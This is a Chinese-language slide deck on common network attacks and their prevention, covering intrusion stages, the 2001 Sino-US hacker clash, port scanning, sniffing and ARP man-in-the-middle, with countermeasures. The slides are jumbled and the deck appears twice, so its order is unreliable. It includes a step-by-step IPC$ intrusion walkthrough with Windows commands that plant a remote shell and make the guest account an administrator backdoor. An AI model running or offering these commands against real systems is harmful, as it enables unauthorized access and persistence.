常见网络攻击与防范(精)
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
提 升 为 最 高 权 限 攻击其 他系统
端口 判断 分析 可能 有漏 洞的 服务
安装 多个 系统 后门
清除 入侵 脚印
获取敏 感信息
作为其 他用途
2001年中美黑客大战
事件背景和经过
4.1撞机事件为导火线 4月初,以PoizonB0x、pr0phet为代表的美国黑客 组织对国内站点进行攻击,约300个左右的站点页 面被修改 4月下旬,国内红(黑)客组织或个人,开始对美 国网站进行小规模的攻击行动,4月26日有人发表 了 “五一卫国网战”战前声明,宣布将在5月1日至 8日,对美国网站进行大规模的攻击行动。 各方都得到第三方支援 各大媒体纷纷报道,评论,中旬结束大战
PoizonB0x、pr0phet更改的网页
国内某大型商业网站 国内某政府网站
中国科学院心理研究所
中经网数据有限公司
国内黑客组织更改的网站页面
美国某大型商业网站 美国某政府网站
美国劳工部网站
美国某节点网站
这次事件中采用的常用攻击手法
红客联盟负责人在5月9日网wk.baidu.com记者新闻发布会
上对此次攻击事件的技术背景说明如下: “我 们更多的是一种不满情绪的发泄,大家也可以 看到被攻破的都是一些小站,大部分都是 NT/Win2000系统, 这个行动在技术上是没有 任何炫耀和炒作的价值的。” 主要采用当时流行的系统漏洞进行攻击
A发往B:(MACx,MACa, PROTOCOL,DATA) B发往A:(MACx,MACb, PROTOCOL,DATA)
网络监听及防范技术
——交换式局域网下
X分别向A和B发送ARP包,促使其修改
ARP表 主机A的ARP表中B为<IPb—MACx> 主机B的ARP表中A为<IPa—MACx> X成为主机A和主机B之间的“中间人”
网络监听及防范技术
分割网段
——网络窃听的被动防范
细化网络会使得局域网中被窃听的可能性减小
使用静态ARP表
手工输入<IP—MAC>地址对
采用第三层交换方式
取消局域网对MAC地址、ARP协议的依赖,而采用基于 IP地址的交换
加密
SSH、SSL、IPSec
网络监听及防范技术
——网络窃听的主动防范 共享式局域网下的主动防范措施 伪造数据包
网络监听及防范技术
——交换式局域网下
ARP改向的中间人窃听
交换式局域网 交换式局域网 数据流 主机A (正常通信状态) 主机B 主机A 数据流 主机X (存在窃听的通信状态) 数据流 主机B
A发往B:(MACb,MACa, PROTOCOL,DATA) B发往A:(MACa,MACb, PROTOCOL,DATA)
常见网络攻击与防范
本资料由-校园大学生创业网-提供http://www.chuangyw.com/ 在线代理http://www.dailiav.com/提供部分资料
提纲
常见的网络攻击方法
常用的安全防范措施
本资料由-校园大学生创业网-提供http://www.chuangyw.com/ 在线代理http://www.dailiav.com/提供部分资料
这次事件中被利用的典型漏洞
用户名泄漏,缺省安装的系统用户名和密码 Unicode 编码可穿越firewall,执行黑客指令 ASP源代码泄露可远程连接的数据库用户名
和密码 SQL server缺省安装 微软Windows 2000登录验证机制可被绕过 Bind 远程溢出,Lion蠕虫 SUN rpc.sadmind 远程溢出,sadmin/IIS蠕虫 Wu-Ftpd 格式字符串错误远程安全漏洞 拒绝服务 (syn-flood , ping )
一次利用ipc$的入侵过程
1. C:\>net use \\x.x.x.x\IPC$ “” /user:“admintitrators”
用《流光》扫到的用户名是administrators,密码为“空”的IP地址 2. C:\>copy srv.exe \\x.x.x.x\admin$ 先复制srv.exe上去,在流光的Tools目录下 3. C:\>net time \\x.x.x.x 查查时间,发现x.x.x.x 的当前时间是 2003/3/19 上午 11:00,命令成功 完成。 4. C:\>at \\x.x.x.x 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间推后) 5. C:\>net time \\x.x.x.x 再查查时间到了没有,如果x.x.x.x 的当前时间是 2003/3/19 上午 11:05, 那就准备开始下面的命令。 6. C:\>telnet x.x.x.x 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但 是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激 活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
常见的网络攻击方法
本资料由-校园大学生创业网-提供http://www.chuangyw.com/ 在线代理http://www.dailiav.com/提供部分资料
入侵技术的发展
高
包欺骗 半开放隐蔽扫描 拒绝服务 DDOS 攻击 www 攻击 自动探测扫描 GUI远程控制 后门 破坏审计系统 会话劫持 控制台入侵 利用已知的漏洞 密码破解 可自动复制的代码 密码猜测 检测网络管理
获取信息
1. 收集主机信息
IP地址、主机是否运行、到要入侵点的路由、主机操作系 统与用户信息等。
应用的方法:
• Ping命令判断计算机是否开着,或者数据包发送到返回 需要多少时间 • Tracert/Tracerout命令跟踪从一台计算机到另外一台 计算机所走的路径 • Finger和Rusers命令收集用户信息 • Host或者Nslookup命令,结合Whois和Finger命令获取 主机、操作系统和用户等信息
工具
入侵者水平
嗅探 擦除痕迹
攻击手法
1980
攻击者
1995 2000 2002
1985
1990
入侵系统的常用步骤
提 升 为 最 高 权 限
采用 漏洞 扫描 工具
选择 会用 的 方式 入侵
获取 系统 一定 权限
安装 系统 后门
获取敏感信息 或者 其他攻击目的
较高明的入侵步骤
判断 系统 选择 最简 方式 入侵 获取 系统 一定 权限
2. 端口扫瞄
获取网络服务的端口作为入侵通道。
7种扫瞄类型:
1.TCP Connect() 3.TCP FIN 5.TCP反向Ident扫瞄 7.UDP ICMP不到达扫瞄
2.TCP SYN 4.IP段扫瞄 6.FTP代理扫瞄
扫瞄软件举例:
1. NSS (网络安全扫描器),可执行 Sendmail 、匿名 FTP 、 NFS出口、TFTP、Host.equiv和Xhost等常规检查。 2. Strobe( 超级优化 TCP 端口检测程序 ) ,可记录指定机器上 的所有开放端口,快速识别指定机器上运行的服务,提示 可以被攻击的服务。 3. SATAN(安全管理员的网络分析工具),SATAN用于扫描远程 主机,发现漏洞,包括FTPD漏洞和可写的FTP目录,NFS漏 洞、NIS漏洞、RSH漏洞、Sendmail和X服务器漏洞等。 4. Jakal扫描器,可启动而不完成TCP连接,因此可以扫描一 个区域而不留下痕迹。 5. IdengTCPscan扫描器,可识别指定TCP端口的进程的UID。
这次事件中被利用的典型漏洞
用户名泄漏,缺省安装的系统用户名和
密码
入侵者
利用黑客工具 扫描系统用户
获得用户名 和简单密码
这次事件中被利用的典型漏洞
Windows 2000登录验证机制可被绕过
常见的安全攻击方法
直接获取口令进入系统:网络监听,暴力破解 利用系统自身安全漏洞 特洛伊木马程序:伪装成工具程序或者游戏等诱使用
监听通过交换机或者网关的所有ARP数据包,与预先建 立的数据库相比较
3.Sniffer扫瞄
原理: sniffer类的软件能把本地网卡设置成工作在 “混杂” (promiscuous)方式,使该网卡能接 收所有数据帧,从而获取别人的口令、金融帐号或 其他敏感机密信息等。 方法与对策: 1、用交换机替换HUB,交换机是两两接通,比普 通HUB安全。 2、使用检测的软件,如CPM Antisniff等,检测网 络中是否有网卡工作在混杂状态(基本原理是发送 本网中并不存在的MAC地址,看看是否有回应,如 有回应,则说明有计算机网卡工作在混杂模式。)。
计算机 C C为直接模式 接收该数据
计算机 D D为直接模式 拒绝接收
计算机 E E为混杂模式 接收该数据
网络监听及防范技术
——交换式局域网下
在数据链路层,数据帧的目的地址是以网
卡的MAC地址来标识 ARP协议实现<IP—MAC>的配对寻址 ARP请求包是以广播的形式发出,正常情 况下只有正确IP地址与的主机才会发出 ARP响应包,告知查询主机自己的MAC地 址。 局域网中每台主机都维护着一张ARP表, 其中存放着<IP—MAC>地址对。
一次利用ipc$的入侵过程
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
ntlm.exe也在《流光》的Tools目录中 8. C:\WINNT\system32>ntlm 输入ntlm启动(这里的C:\WINNT\system32>是在对方计算机上运行当 出现“DONE”的时候,就说明已经启动正常。然后使用“net start telnet”来开启Telnet服务) 9. Telnet x.x.x.x,接着输入用户名与密码就进入对方了 为了方便日后登陆,将guest激活并加到管理组 10. C:\>net user guest /active:yes 11. C:\>net user guest 1234 将Guest的密码改为1234 12. C:\>net localgroup administrators guest /add 将Guest变为Administrator
网络监听及防范技术
网络窃听是指通过截获他人网络上通信的
数据流,并非法从中提取重要信息的一种 方法 间接性
利用现有网络协议的一些漏洞来实现,不直接对受害主 机系统的整体性进行任何操作或破坏
隐蔽性
网络窃听只对受害主机发出的数据流进行操作,不与主 机交换信息,也不影响受害主机的正常通信
网络监听及防范技术
构造一个含有正确目标IP地址和一个不存在目标MAC地 址——各个操作系统处理方式不同,一个比较好的MAC 地址是FF-FF-FF-FF-FF-FE
性能分析
向网络上发送大量包含无效MAC地址的数据包,窃听主 机会因处理大量信息而导致性能下降
网络监听及防范技术
——网络窃听的主动防范 交换式局域网下的主动防范措施 监听ARP数据包
若等于自己的MAC地址或是广播MAC地址,则提交给 上层处理程序,否则丢弃此数据
当网卡工作于混杂模式的时候,它不做任
何判断,直接将接收到的所有帧提交给上 层处理程序 共享式网络下窃听就使用网卡的混杂模式
网络监听及防范技术
——共享式局域网下
集线器(HUB)
A向C发送数 据
计算机 A
计算机 B B为直接模式 拒绝接收
——共享式局域网下
共享式局域网采用的是广播信道,每一台
主机所发出的帧都会被全网内所有主机接 收到 一般网卡具有以下四种工作模式:广播模 式、多播模式、直接模式和混杂模式 网卡的缺省工作模式是广播模式和直接模 式,即只接收发给自己的和广播的帧
网络监听及防范技术
——共享式局域网下
使用MAC地址来确定数据包的流向
户打开或下载,然后使用户在无意中激活,导致系统 后门被安装 WWW欺骗:诱使用户访问纂改过的网页 电子邮件攻击:邮件炸弹、邮件欺骗 网络监听:获取明文传输的敏感信息 通过一个节点来攻击其他节点:攻击者控制一台主机 后,经常通过IP欺骗或者主机信任关系来攻击其他节 点以隐蔽其入侵路径和擦除攻击证据 拒绝服务攻击和分布式拒绝服务攻击(D.o.S 和D.D.o.S)
端口 判断 分析 可能 有漏 洞的 服务
安装 多个 系统 后门
清除 入侵 脚印
获取敏 感信息
作为其 他用途
2001年中美黑客大战
事件背景和经过
4.1撞机事件为导火线 4月初,以PoizonB0x、pr0phet为代表的美国黑客 组织对国内站点进行攻击,约300个左右的站点页 面被修改 4月下旬,国内红(黑)客组织或个人,开始对美 国网站进行小规模的攻击行动,4月26日有人发表 了 “五一卫国网战”战前声明,宣布将在5月1日至 8日,对美国网站进行大规模的攻击行动。 各方都得到第三方支援 各大媒体纷纷报道,评论,中旬结束大战
PoizonB0x、pr0phet更改的网页
国内某大型商业网站 国内某政府网站
中国科学院心理研究所
中经网数据有限公司
国内黑客组织更改的网站页面
美国某大型商业网站 美国某政府网站
美国劳工部网站
美国某节点网站
这次事件中采用的常用攻击手法
红客联盟负责人在5月9日网wk.baidu.com记者新闻发布会
上对此次攻击事件的技术背景说明如下: “我 们更多的是一种不满情绪的发泄,大家也可以 看到被攻破的都是一些小站,大部分都是 NT/Win2000系统, 这个行动在技术上是没有 任何炫耀和炒作的价值的。” 主要采用当时流行的系统漏洞进行攻击
A发往B:(MACx,MACa, PROTOCOL,DATA) B发往A:(MACx,MACb, PROTOCOL,DATA)
网络监听及防范技术
——交换式局域网下
X分别向A和B发送ARP包,促使其修改
ARP表 主机A的ARP表中B为<IPb—MACx> 主机B的ARP表中A为<IPa—MACx> X成为主机A和主机B之间的“中间人”
网络监听及防范技术
分割网段
——网络窃听的被动防范
细化网络会使得局域网中被窃听的可能性减小
使用静态ARP表
手工输入<IP—MAC>地址对
采用第三层交换方式
取消局域网对MAC地址、ARP协议的依赖,而采用基于 IP地址的交换
加密
SSH、SSL、IPSec
网络监听及防范技术
——网络窃听的主动防范 共享式局域网下的主动防范措施 伪造数据包
网络监听及防范技术
——交换式局域网下
ARP改向的中间人窃听
交换式局域网 交换式局域网 数据流 主机A (正常通信状态) 主机B 主机A 数据流 主机X (存在窃听的通信状态) 数据流 主机B
A发往B:(MACb,MACa, PROTOCOL,DATA) B发往A:(MACa,MACb, PROTOCOL,DATA)
常见网络攻击与防范
本资料由-校园大学生创业网-提供http://www.chuangyw.com/ 在线代理http://www.dailiav.com/提供部分资料
提纲
常见的网络攻击方法
常用的安全防范措施
本资料由-校园大学生创业网-提供http://www.chuangyw.com/ 在线代理http://www.dailiav.com/提供部分资料
这次事件中被利用的典型漏洞
用户名泄漏,缺省安装的系统用户名和密码 Unicode 编码可穿越firewall,执行黑客指令 ASP源代码泄露可远程连接的数据库用户名
和密码 SQL server缺省安装 微软Windows 2000登录验证机制可被绕过 Bind 远程溢出,Lion蠕虫 SUN rpc.sadmind 远程溢出,sadmin/IIS蠕虫 Wu-Ftpd 格式字符串错误远程安全漏洞 拒绝服务 (syn-flood , ping )
一次利用ipc$的入侵过程
1. C:\>net use \\x.x.x.x\IPC$ “” /user:“admintitrators”
用《流光》扫到的用户名是administrators,密码为“空”的IP地址 2. C:\>copy srv.exe \\x.x.x.x\admin$ 先复制srv.exe上去,在流光的Tools目录下 3. C:\>net time \\x.x.x.x 查查时间,发现x.x.x.x 的当前时间是 2003/3/19 上午 11:00,命令成功 完成。 4. C:\>at \\x.x.x.x 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间推后) 5. C:\>net time \\x.x.x.x 再查查时间到了没有,如果x.x.x.x 的当前时间是 2003/3/19 上午 11:05, 那就准备开始下面的命令。 6. C:\>telnet x.x.x.x 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但 是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激 活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
常见的网络攻击方法
本资料由-校园大学生创业网-提供http://www.chuangyw.com/ 在线代理http://www.dailiav.com/提供部分资料
入侵技术的发展
高
包欺骗 半开放隐蔽扫描 拒绝服务 DDOS 攻击 www 攻击 自动探测扫描 GUI远程控制 后门 破坏审计系统 会话劫持 控制台入侵 利用已知的漏洞 密码破解 可自动复制的代码 密码猜测 检测网络管理
获取信息
1. 收集主机信息
IP地址、主机是否运行、到要入侵点的路由、主机操作系 统与用户信息等。
应用的方法:
• Ping命令判断计算机是否开着,或者数据包发送到返回 需要多少时间 • Tracert/Tracerout命令跟踪从一台计算机到另外一台 计算机所走的路径 • Finger和Rusers命令收集用户信息 • Host或者Nslookup命令,结合Whois和Finger命令获取 主机、操作系统和用户等信息
工具
入侵者水平
嗅探 擦除痕迹
攻击手法
1980
攻击者
1995 2000 2002
1985
1990
入侵系统的常用步骤
提 升 为 最 高 权 限
采用 漏洞 扫描 工具
选择 会用 的 方式 入侵
获取 系统 一定 权限
安装 系统 后门
获取敏感信息 或者 其他攻击目的
较高明的入侵步骤
判断 系统 选择 最简 方式 入侵 获取 系统 一定 权限
2. 端口扫瞄
获取网络服务的端口作为入侵通道。
7种扫瞄类型:
1.TCP Connect() 3.TCP FIN 5.TCP反向Ident扫瞄 7.UDP ICMP不到达扫瞄
2.TCP SYN 4.IP段扫瞄 6.FTP代理扫瞄
扫瞄软件举例:
1. NSS (网络安全扫描器),可执行 Sendmail 、匿名 FTP 、 NFS出口、TFTP、Host.equiv和Xhost等常规检查。 2. Strobe( 超级优化 TCP 端口检测程序 ) ,可记录指定机器上 的所有开放端口,快速识别指定机器上运行的服务,提示 可以被攻击的服务。 3. SATAN(安全管理员的网络分析工具),SATAN用于扫描远程 主机,发现漏洞,包括FTPD漏洞和可写的FTP目录,NFS漏 洞、NIS漏洞、RSH漏洞、Sendmail和X服务器漏洞等。 4. Jakal扫描器,可启动而不完成TCP连接,因此可以扫描一 个区域而不留下痕迹。 5. IdengTCPscan扫描器,可识别指定TCP端口的进程的UID。
这次事件中被利用的典型漏洞
用户名泄漏,缺省安装的系统用户名和
密码
入侵者
利用黑客工具 扫描系统用户
获得用户名 和简单密码
这次事件中被利用的典型漏洞
Windows 2000登录验证机制可被绕过
常见的安全攻击方法
直接获取口令进入系统:网络监听,暴力破解 利用系统自身安全漏洞 特洛伊木马程序:伪装成工具程序或者游戏等诱使用
监听通过交换机或者网关的所有ARP数据包,与预先建 立的数据库相比较
3.Sniffer扫瞄
原理: sniffer类的软件能把本地网卡设置成工作在 “混杂” (promiscuous)方式,使该网卡能接 收所有数据帧,从而获取别人的口令、金融帐号或 其他敏感机密信息等。 方法与对策: 1、用交换机替换HUB,交换机是两两接通,比普 通HUB安全。 2、使用检测的软件,如CPM Antisniff等,检测网 络中是否有网卡工作在混杂状态(基本原理是发送 本网中并不存在的MAC地址,看看是否有回应,如 有回应,则说明有计算机网卡工作在混杂模式。)。
计算机 C C为直接模式 接收该数据
计算机 D D为直接模式 拒绝接收
计算机 E E为混杂模式 接收该数据
网络监听及防范技术
——交换式局域网下
在数据链路层,数据帧的目的地址是以网
卡的MAC地址来标识 ARP协议实现<IP—MAC>的配对寻址 ARP请求包是以广播的形式发出,正常情 况下只有正确IP地址与的主机才会发出 ARP响应包,告知查询主机自己的MAC地 址。 局域网中每台主机都维护着一张ARP表, 其中存放着<IP—MAC>地址对。
一次利用ipc$的入侵过程
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
ntlm.exe也在《流光》的Tools目录中 8. C:\WINNT\system32>ntlm 输入ntlm启动(这里的C:\WINNT\system32>是在对方计算机上运行当 出现“DONE”的时候,就说明已经启动正常。然后使用“net start telnet”来开启Telnet服务) 9. Telnet x.x.x.x,接着输入用户名与密码就进入对方了 为了方便日后登陆,将guest激活并加到管理组 10. C:\>net user guest /active:yes 11. C:\>net user guest 1234 将Guest的密码改为1234 12. C:\>net localgroup administrators guest /add 将Guest变为Administrator
网络监听及防范技术
网络窃听是指通过截获他人网络上通信的
数据流,并非法从中提取重要信息的一种 方法 间接性
利用现有网络协议的一些漏洞来实现,不直接对受害主 机系统的整体性进行任何操作或破坏
隐蔽性
网络窃听只对受害主机发出的数据流进行操作,不与主 机交换信息,也不影响受害主机的正常通信
网络监听及防范技术
构造一个含有正确目标IP地址和一个不存在目标MAC地 址——各个操作系统处理方式不同,一个比较好的MAC 地址是FF-FF-FF-FF-FF-FE
性能分析
向网络上发送大量包含无效MAC地址的数据包,窃听主 机会因处理大量信息而导致性能下降
网络监听及防范技术
——网络窃听的主动防范 交换式局域网下的主动防范措施 监听ARP数据包
若等于自己的MAC地址或是广播MAC地址,则提交给 上层处理程序,否则丢弃此数据
当网卡工作于混杂模式的时候,它不做任
何判断,直接将接收到的所有帧提交给上 层处理程序 共享式网络下窃听就使用网卡的混杂模式
网络监听及防范技术
——共享式局域网下
集线器(HUB)
A向C发送数 据
计算机 A
计算机 B B为直接模式 拒绝接收
——共享式局域网下
共享式局域网采用的是广播信道,每一台
主机所发出的帧都会被全网内所有主机接 收到 一般网卡具有以下四种工作模式:广播模 式、多播模式、直接模式和混杂模式 网卡的缺省工作模式是广播模式和直接模 式,即只接收发给自己的和广播的帧
网络监听及防范技术
——共享式局域网下
使用MAC地址来确定数据包的流向
户打开或下载,然后使用户在无意中激活,导致系统 后门被安装 WWW欺骗:诱使用户访问纂改过的网页 电子邮件攻击:邮件炸弹、邮件欺骗 网络监听:获取明文传输的敏感信息 通过一个节点来攻击其他节点:攻击者控制一台主机 后,经常通过IP欺骗或者主机信任关系来攻击其他节 点以隐蔽其入侵路径和擦除攻击证据 拒绝服务攻击和分布式拒绝服务攻击(D.o.S 和D.D.o.S)